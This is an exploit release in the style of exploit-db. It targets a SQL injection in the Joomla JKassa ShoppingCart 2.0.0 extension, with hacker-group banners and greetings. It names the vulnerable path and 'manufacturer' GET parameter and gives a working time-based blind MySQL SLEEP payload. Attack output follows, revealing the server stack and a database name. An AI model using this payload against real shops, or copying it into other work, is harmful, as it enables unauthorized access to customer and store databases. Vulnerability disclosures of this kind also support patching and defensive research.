Joomla JKassa ShoppingCart 2.0.0 SQL Injection

┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : GeneticsPro - jkassa.com                                                   ││  Software : Joomla JKassa ShoppingCart 2.0.0                                           ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /shop/men/sweatshirts.feedGET parameter 'manufacturer' is vulnerable---Parameter: manufacturer (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.4.16back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)current database: 'jkassa_umarket'[-] Done